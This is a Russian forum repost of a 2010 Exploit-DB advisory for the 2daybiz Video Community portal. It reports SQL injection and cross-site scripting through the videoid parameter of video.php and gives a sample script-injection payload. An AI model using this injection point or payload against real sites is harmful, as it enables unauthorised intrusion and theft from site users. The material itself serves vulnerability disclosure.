Exploit Video Community portal - SQL Injection / Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
13970
Проверка EDB
  1. Пройдено
Автор
L0RD CRUSAD3R
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2010-2459 cve-2010-2458
Дата публикации
2010-06-22
Код:
1               ##########################################             1
0               I'm L0rd CrusAd3r member from Inj3ct0r Team            1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
Author: L0rd CrusAd3r aka VSN [[email protected]]
Exploit Title:Video Community portal SQLi and XSS Vulnerable
Vendor url:http://www.2daybiz.com/
Version:1
Price:120$
Published: 2010-06-22
Greetz to:r0073r (inj3ct0r.com), Sid3^effects, MaYur, MA1201, M4n0j, Sonic Bluehat.
Special Greetz: Topsecure.net, inj3ct0r Team , Andhrahackers.com
Shoutzz:- To all ICW members.
~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
Description:

2daybiz Video Community portal is the ultimate solution for starting your video sharing and uploading community similar to YouTube, Daily Motion and Myspace Videos. This enterprise level video sharing software offers a powerful and rich featured solution. In this software members can upload videos, rate videos, tag videos, leave comments, edit uploaded videos, title and description set video as public/private, video play list, create channels, groups and favorite videos. 

~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
Vulnerability:

*SQLi Vulnerable

DEMO URL:

http://www.site.com/products/videocommunity/video.php?videoid=[sqli]

*XSS Vulnerable

Parameter:'"--><script>alert(0x000872)</script>

DEMO URL:

http://www.site.com/products/videocommunity/video.php?videoid=[xss]

# 0day n0 m0re #
# L0rd CrusAd3r #
 
Источник
www.exploit-db.com

Похожие темы